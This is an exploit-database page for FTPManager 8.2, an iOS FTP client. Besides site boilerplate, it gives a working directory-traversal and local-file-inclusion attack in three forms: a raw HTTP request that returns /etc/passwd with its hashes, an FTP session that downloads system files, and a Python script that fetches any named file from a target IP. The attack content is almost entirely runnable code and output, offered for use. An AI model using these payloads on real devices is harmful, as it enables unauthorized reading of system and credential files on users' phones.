0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
FTPManager 8.2 Local File Inclusion / Directory Traversal Exploit
# Exploit Title: FTPManager 8.2 Local File inclusion # Exploit Author: Chokri Hammedi # Vendor Homepage: https://www.skyjos.com/ # Software Link: https://apps.apple.com/us/app/ftpmanager-ftp-sftp-client/id525959186 # Version: 8.2 # Tested on: Ios 15.6 GET /../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 Host: 192.168.1.178:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close ------------------ HTTP/1.1 200 OK Connection: Close Server: GCDWebUploader Content-Type: application/octet-stream Last-Modified: Wed, 13 Jul 2022 10:35:46 GMT Date: Tue, 06 Sep 2022 03:05:05 GMT Content-Length: 2581 Cache-Control: max-age=3600, public Etag: 1152921500312311384/1657708546/0 ## # User Database # # This file is the authoritative user database. ## nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh daemon:*:1:1:System Services:/var/root:/usr/bin/false _ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false _networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false _wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false _installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false _neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false _ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false _securityd:*:64:64:securityd:/var/empty:/usr/bin/false _mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false _sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false _unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false _usbmuxd:*:213:213:iPhone OS Device Helper:/var/db/lockdown:/usr/bin/false _distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false _astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false _ondemand:*:249:249:On Demand Resource Daemon:/var/db/ondemand:/usr/bin/false _findmydevice:*:254:254:Find My Device Daemon:/var/db/findmydevice:/usr/bin/false _datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false _captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false _analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false _timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false _gpsd:*:267:267:GPS Daemon:/var/db/gpsd:/usr/bin/false _reportmemoryexception:*:269:269:ReportMemoryException:/var/empty:/usr/bin/false _driverkit:*:270:270:DriverKit:/var/empty:/usr/bin/false _diskimagesiod:*:271:271:DiskImages IO Daemon:/var/db/diskimagesiod:/usr/bin/false _logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false _iconservices:*:276:276:Icon services:/var/empty:/usr/bin/false _rmd:*:277:277:Remote Management Daemon:/var/db/rmd:/usr/bin/false _accessoryupdater:*:278:278:Accessory Update Daemon:/var/db/accessoryupdater:/usr/bin/false _knowledgegraphd:*:279:279:Knowledge Graph Daemon:/var/db/knowledgegraphd:/usr/bin/false _coreml:*:280:280:CoreML Services:/var/empty:/usr/bin/false _sntpd:*:281:281:SNTP Server Daemon:/var/empty:/usr/bin/false _trustd:*:282:282:trustd:/var/empty:/usr/bin/false _mmaintenanced:*:283:283:mmaintenanced:/var/db/mmaintenanced:/usr/bin/false _darwindaemon:*:284:284:Darwin Daemon:/var/db/darwindaemon:/usr/bin/false _notification_proxy:*:285:285:Notification Proxy:/var/empty:/usr/bin/false --------------------------------------------------- # Exploit Title: FTPManager 8.2 Directory Traversal (ftp) # Date: Sep 6, 2022 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://www.skyjos.com/ # Software Link: https://apps.apple.com/us/app/ftpmanager-ftp-sftp-client/id525959186 # Version: 8.2 # Tested on: ios 15.6 #ftp 192.168.1.178 2121 Connected to 192.168.1.178. 220 ---------- Welcome to FTPManager ---------- Name (192.168.1.178:chokri): 230 User chokri logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> cd /../../../../../../../../../../../../../../../../ 250 OK. Current directory is /../../../../../../../../../../../../../../../../ ftp> ls 200 PORT command successful. 150 Accepted data connection total 10 drwxr-xr-x 0 root wheel 256 Jan 01 1970 usr drwxr-xr-x 0 root wheel 128 Jan 01 1970 bin drwxr-xr-x 0 root wheel 576 Jan 01 1970 sbin drwxr-xr-x 0 root wheel 160 Jan 01 1970 System drwxr-xr-x 0 root wheel 672 Jan 01 1970 Library drwxr-xr-x 0 root wheel 224 Jan 01 1970 private drwxr-xr-x 0 root wheel 1132 Jan 01 1970 dev drwxr-xr-x 0 root admin 3968 Jan 01 1970 Applications drwxr-xr-x 0 root admin 64 Jan 01 1970 Developer drwxr-xr-x 0 root admin 64 Jan 01 1970 cores WARNING! 10 bare linefeeds received in ASCII mode File may not have transferred correctly. 226 Transfer complete. ftp> cd private/etc 250 OK. Current directory is /../../../../../../../../../../../../../../../../private/etc ftp> get passwd local: passwd remote: passwd 200 PORT command successful. 150 Opening BINARY mode data connection for 'passwd'. 226 Transfer complete. 2581 bytes received in 0.00 secs (11.5020 MB/s) ftp> get services local: services remote: services 200 PORT command successful. 150 Opening BINARY mode data connection for 'services'. 226 Transfer complete. 677977 bytes received in 0.17 secs (3.8257 MB/s) --------------------------------------------------- # Exploit Title: FTPManager 8.2 Local File inclusion (ftp) python # Date: Sep 6, 2022 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://www.skyjos.com/ # Software Link: https://apps.apple.com/us/app/ftpmanager-ftp-sftp-client/id525959186 # Version: 8.2 # Tested on: ios 15.6 from ftplib import FTP import argparse help = " FTPManager 8.2 Local File inclusion by chokri hammedi" parser = argparse.ArgumentParser(description=help) parser.add_argument("--target", help="Target IP", required=True) parser.add_argument("--file", help="File To Open eg: etc/passwd") args = parser.parse_args() ip = args.target port = 2121 # Default Port files = args.file ftpConnection = FTP() ftpConnection.connect(host=ip, port=port) ftpConnection.login(); def downloadFile(): ftpConnection.cwd('/../../../../../../../../../../../../../../../../') ftpConnection.retrbinary(f"RETR {files}", open('data.txt', 'wb').write) ftpConnection.close() file = open('data.txt', 'r') print (f"[***] The contents of {files}\n") print (file.read()) downloadFile() # 0day.today [2024-12-23] #